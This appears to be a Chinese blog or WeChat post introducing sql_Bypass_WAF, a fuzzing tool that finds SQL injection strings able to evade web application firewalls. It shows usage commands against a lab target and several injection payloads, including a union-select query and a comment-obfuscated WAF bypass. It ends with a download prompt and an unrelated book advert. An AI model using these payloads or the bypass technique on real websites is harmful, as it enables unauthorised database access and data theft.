===================================
0x01 工具介绍
sql_Bypass_WAF是一款sql注入绕waf工具,通过fuzz的方式,进行大量测试找到bypass语句。
0x02 安装与使用
1、-h查看参数帮助
2、先判断出waf拦截的sql恶意语句。
3、再将想要Bypass的语句带入到工具中,注意带入到工具中的url为waf拦截的url。
如果bypass一个参数,用"~"进行包裹,如
http://192.168.170.133/sqli/less-1/?id=1' and 1=1 --+
将"and"用~包裹后:
http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+
命令示例:
sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+"
如果为两个参数,在两个参数中间加"^",如
http://192.168.170.133/sqli/less-1/?id=1' order by 1 --+
将"order by"用^指定
http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+
命令示例:
sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+"
暂不支持超过两个参数的fuzz,但可以拆分依次带入测试,如:
测试语句:
http://192.168.170.133/sqli/less-1/?id=-1' union select 1,database(),3 --+
先bypass"union select"
http://192.168.170.133/sqli/less-1/?id=-1' union^select 1,2,3 --+
bypass后语句:
http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,2,3 --+
再bypass"database()"
http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,database^(),3 --+
0x03 项目链接下载
2、关注公众号web安全工具库,后台回复:工具666
3、每日抽奖送书
· 推 荐 阅 读 ·
本书以图解的方式讲述数据结构及其算法,力求简洁明了地阐述复杂的算法理论,以C作为描述语言解析算法的执行过程,以大量的范例程序来展示数据结构的使用及其相关算法的具体实现。